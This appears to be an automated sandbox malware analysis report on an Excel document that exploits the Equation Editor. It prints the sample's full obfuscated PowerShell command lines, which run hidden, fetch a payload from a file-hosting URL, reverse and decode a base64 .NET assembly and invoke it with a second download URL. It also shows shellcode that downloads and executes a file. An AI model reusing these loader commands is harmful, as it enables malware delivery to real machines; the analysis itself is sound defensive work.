                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0x1170000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:11:56:26
                                                                      Start date:27/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
                                                                      Imagebase:0x1170000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Call Graph

                                                                      • Entrypoint
                                                                      • Decryption Function
                                                                      • Executed
                                                                      • Not Executed
                                                                      • Show Help
                                                                      callgraph 1 Error: Graph is empty

                                                                      Module: Sheet1

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet1"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet2

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet2"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet3

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet3"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: ThisWorkbook

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "ThisWorkbook"

                                                                      2

                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:16.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:61.9%
                                                                        Total number of Nodes:42
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 363 35703e7 366 3570404 ExitProcess 363->366 375 357041d 366->375 376 3570423 375->376 383 3570439 376->383 384 357043f 383->384 389 3570460 384->389 390 3570463 389->390 393 35704f4 390->393 394 35704f6 393->394 395 3570509 9 API calls 394->395 396 35704fb 395->396 321 3570636 GetPEB 322 3570644 321->322 323 35704f4 324 35704f6 323->324 327 3570509 LoadLibraryW 324->327 332 3570523 327->332 333 3570526 332->333 335 3570534 333->335 336 35705dc URLDownloadToFileW 333->336 346 35705f5 336->346 341 3570604 ShellExecuteW 361 357062f 341->361 343 3570623 344 3570669 343->344 345 3570632 ExitProcess 343->345 344->335 347 35705f7 346->347 348 35705fc 347->348 349 357060a 3 API calls 347->349 350 3570604 ShellExecuteW 348->350 352 35705e5 348->352 349->348 351 357062f ExitProcess 350->351 353 3570623 351->353 355 357060a 352->355 353->352 354 3570632 ExitProcess 353->354 356 357060d ShellExecuteW 355->356 357 357062f ExitProcess 356->357 358 3570623 356->358 357->358 359 3570632 ExitProcess 358->359 360 35705fc 358->360 360->341 360->344 362 3570632 ExitProcess 361->362

                                                                        Callgraph

                                                                        Executed Functions

                                                                        Function 035705DC Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 35705dc-3570602 URLDownloadToFileW call 35705f5 call 357060a 6 3570604-3570626 ShellExecuteW call 357062f 0->6 7 3570669-3570675 0->7 9 3570678 6->9 17 3570628 6->17 7->9 11 3570680-3570684 9->11 12 357067a-357067e 9->12 15 3570686-357068a 11->15 16 3570699-357069b 11->16 12->11 14 357068c-3570693 12->14 18 3570697 14->18 19 3570695 14->19 15->14 15->16 20 35706ab-35706ac 16->20 17->16 21 357062a-3570634 ExitProcess 17->21 22 357069d-35706a6 18->22 19->16 25 357066f-3570672 22->25 26 35706a8 22->26 25->22 27 3570674 25->27 26->20 27->9
                                                                        APIs
                                                                        • URLDownloadToFileW.URLMON(00000000,03570534,?,00000000,00000000), ref: 035705DE
                                                                          • Part of subcall function 035705F5: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0357061C
                                                                          • Part of subcall function 035705F5: ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                                        • String ID:
                                                                        • API String ID: 3584569557-0
                                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction ID: 8fbd04e570ae48a05d7d9b5d72981ba315d8ccf25770df5ca5267e031f787b63
                                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction Fuzzy Hash: BFF0279058C3442DE632E7747CBEF6A6FE8BFC1B40F150889B1424F0F2E994840486A9
                                                                        Function 0357060A Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 29 357060a-357061c ShellExecuteW 31 3570623-3570626 29->31 32 357061e call 357062f 29->32 34 3570678 31->34 35 3570628 31->35 32->31 38 3570680-3570684 34->38 39 357067a-357067e 34->39 36 357062a-3570634 ExitProcess 35->36 37 3570699-357069b 35->37 43 35706ab-35706ac 37->43 38->37 42 3570686-357068a 38->42 39->38 41 357068c-3570693 39->41 44 3570697 41->44 45 3570695 41->45 42->37 42->41 47 357069d-35706a6 44->47 45->37 49 357066f-3570672 47->49 50 35706a8 47->50 49->47 51 3570674 49->51 50->43 51->34
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0357061C
                                                                          • Part of subcall function 0357062F: ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction ID: c40006f2870c131050379b775d1411b933346464b57d5f8538092dcf36e42a0a
                                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction Fuzzy Hash: 63014E9455430215DF30F668783DBB9ABD4BBC1710FCC485BE5810F4F5E15480C34AE9
                                                                        Function 035705F5 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 52 35705f5-35705f7 54 35705fc-3570602 52->54 55 35705f7 call 357060a 52->55 56 3570604-3570626 ShellExecuteW call 357062f 54->56 57 3570669-3570675 54->57 55->54 59 3570678 56->59 67 3570628 56->67 57->59 61 3570680-3570684 59->61 62 357067a-357067e 59->62 65 3570686-357068a 61->65 66 3570699-357069b 61->66 62->61 64 357068c-3570693 62->64 68 3570697 64->68 69 3570695 64->69 65->64 65->66 70 35706ab-35706ac 66->70 67->66 71 357062a-3570634 ExitProcess 67->71 72 357069d-35706a6 68->72 69->66 75 357066f-3570672 72->75 76 35706a8 72->76 75->72 77 3570674 75->77 76->70 77->59
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction ID: f82e5ba485dc28a2766776edb07ac1763a0dc4a6372f01863a30e434d1eb6f52
                                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction Fuzzy Hash: A701496056830124EB70E7787CBCBAEAAD8BBC1700F98885EE4814F4F1E294844386AD
                                                                        Function 03570509 Relevance: 1.6, APIs: 1, Instructions: 85libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 79 3570509-357050b LoadLibraryW call 3570523 81 3570510-3570515 79->81 82 3570517-3570584 call 35705dc 81->82 83 3570585 81->83 82->83 84 3570586-35705da 82->84 83->84
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(035704FB), ref: 03570509
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 78a7489c430338153a31ca61fdfe97268e92a922119e775e7e1a099b5210e4b4
                                                                        • Instruction ID: 7626c3d0ff2f069cbd8f164b2a6835a893612209efd776c21285ecd0cc9ee675
                                                                        • Opcode Fuzzy Hash: 78a7489c430338153a31ca61fdfe97268e92a922119e775e7e1a099b5210e4b4
                                                                        • Instruction Fuzzy Hash: 0F31E2D280C7D12FDB17C634AC7A614BFA53923144B0DCACFD8C60A4E3E3589101C752
                                                                        Function 0357062F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 99 357062f-3570634 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 03570636 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 101 3570636-3570641 GetPEB 102 3570644-3570655 call 357065e 101->102 105 3570657-357065b 102->105
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction ID: 7557719fa584f282003110c11fe5b8eb6900e6605718e0ca5b042fe7c109ef10
                                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction Fuzzy Hash: 61D052752025028FC718DF04E990E12F3BAFFD8610B28C268E0044B669D730EC92CAD4

                                                                        Non-executed Functions

                                                                        Function 03570404 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 106 3570404-3570423 ExitProcess call 357041d 109 357042a-357042b 106->109 110 3570425 call 3570439 106->110 111 357047e-3570499 109->111 112 357042e 109->112 110->109 115 357049b-357049c 111->115 113 3570430-3570433 112->113 114 357049f-35704a2 112->114 113->115 116 3570436 113->116 117 35704a4-35704a6 114->117 118 35704a3 114->118 115->114 119 35704ab-35704b8 116->119 120 3570438-357043b 116->120 125 35704a7 117->125 126 35704a8-35704aa 117->126 118->117 131 35704ba-35704bc 119->131 123 357043f-3570447 call 3570460 120->123 124 357043d 120->124 132 35704b9 123->132 133 3570449-357044e 123->133 124->123 125->126 126->119 135 35704c2-35704f2 131->135 132->131 133->132 134 3570450 133->134 136 3570452-3570456 134->136 137 35704c1 134->137 136->119 139 3570458-357047b call 35704f4 136->139 137->135 139->111
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(035703F2), ref: 03570404
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 22f6b6b3b61817ca39fc1bbd9dfb3415d3a36381e95bd7110df24cf54c0947b3
                                                                        • Instruction ID: 654ffd381a6b3a4d4b576430611397e66c351365660292bd4888b787305a8332
                                                                        • Opcode Fuzzy Hash: 22f6b6b3b61817ca39fc1bbd9dfb3415d3a36381e95bd7110df24cf54c0947b3
                                                                        • Instruction Fuzzy Hash: 623178A680D7C11FDB16DB70BA6A115FFA6796211070D86CFC5860F5F3E368D605C392

                                                                        Executed Functions

                                                                        Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.472777822.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52b0bd1ea27a769085388a26fb6a0c2245e76a058cfe19039f7d74f2afca11d0
                                                                        • Instruction ID: aa9237318265e5a845e30c79d6e515d5aea1595cc128f5b27d3e835e7fdb6d7b
                                                                        • Opcode Fuzzy Hash: 52b0bd1ea27a769085388a26fb6a0c2245e76a058cfe19039f7d74f2afca11d0
                                                                        • Instruction Fuzzy Hash: 8801A271504380AAEB204E29EC84B67FFD8EF41724F2C851AFC495B286C779D845DAB2
                                                                        Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.472777822.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18ed8002776f595468606f2ec0fa9412434331c2b6277b7cd556e033003de11f
                                                                        • Instruction ID: f9a5902756e8b00e4ce193d42d1c97bdb6f8586d2f8ec2dd336e31c135054c0b
                                                                        • Opcode Fuzzy Hash: 18ed8002776f595468606f2ec0fa9412434331c2b6277b7cd556e033003de11f
                                                                        • Instruction Fuzzy Hash: 55F06271404344AFEB108A16DCC4B66FFD8EB41724F18C55AED485F686C3799C44CAB1

                                                                        Executed Functions

                                                                        Function 004049B8 Relevance: 43.8, Strings: 34, Instructions: 1268COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$8#f$8#f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$tPp$tPp$tPp$tPp$$p
                                                                        • API String ID: 0-1808826156
                                                                        • Opcode ID: 4eda78791f0439306f736a668b745cb4ca9a2e296f0e4d9b5a26a3220771ab4a
                                                                        • Instruction ID: 0d7369d90a521aebbe2df260c9ed407d46b120d92340cc6c3b5b05016e5c66c0
                                                                        • Opcode Fuzzy Hash: 4eda78791f0439306f736a668b745cb4ca9a2e296f0e4d9b5a26a3220771ab4a
                                                                        • Instruction Fuzzy Hash: 55921271B043009FCB199A68D810B6BBBB2EFD5310F2884BBD545DB395DA79CC42CB96
                                                                        Function 00405BD0 Relevance: 41.5, Strings: 31, Instructions: 2796COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$L4p$L4p$L4p$`\f$`\f$`\f$`\f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$tPp$tPp$$p$$p$[f$[f$[f$[f
                                                                        • API String ID: 0-1943658126
                                                                        • Opcode ID: 51c4fd35ecaff4af2cdba3465e4b56c94c7169ae3041f0ca0d15723a22daac12
                                                                        • Instruction ID: 05d995d3bc68343a0ab5c5e9ae2c68d784de4f043cb1ac4f916a7f16c6318a2f
                                                                        • Opcode Fuzzy Hash: 51c4fd35ecaff4af2cdba3465e4b56c94c7169ae3041f0ca0d15723a22daac12
                                                                        • Instruction Fuzzy Hash: C0E2C130B042049FDB15DB68D854BABBBB2AF85310F25807AE846AF3D5CB35DC52CB56
                                                                        Function 00403020 Relevance: 20.8, Strings: 16, Instructions: 761COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f
                                                                        • API String ID: 0-3723372221
                                                                        • Opcode ID: 11458e0d5c3a184e9bfbf8bba8dab6f0de46cb9a63cbc842d6abfe7a99806dcd
                                                                        • Instruction ID: 64c2a7fdb4fad9474f10d4817a280c28b12dec6a2a63f517ef7b78c3a03d46b4
                                                                        • Opcode Fuzzy Hash: 11458e0d5c3a184e9bfbf8bba8dab6f0de46cb9a63cbc842d6abfe7a99806dcd
                                                                        • Instruction Fuzzy Hash: 0E421671B042009FCB249F28981066BBFFAAFD5312F24847BD945EB395DA35CE42C796
                                                                        Function 004039A0 Relevance: 19.4, Strings: 15, Instructions: 603COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0Up$4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$[f$[f
                                                                        • API String ID: 0-551287460
                                                                        • Opcode ID: fe3a85db22bf6a3385971449ed6dd7f1ec0264a180e311003446ccdc57d9c38b
                                                                        • Instruction ID: a596586a3a719991df571051be0bb00cce8cde155840f9a069078d87588546b8
                                                                        • Opcode Fuzzy Hash: fe3a85db22bf6a3385971449ed6dd7f1ec0264a180e311003446ccdc57d9c38b
                                                                        • Instruction Fuzzy Hash: 9F120331B042018FCB149F68D450AABBFFAAFD5311B24807BD545EB392DA39DE02C796
                                                                        Function 00400B48 Relevance: 15.3, Strings: 12, Instructions: 311COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
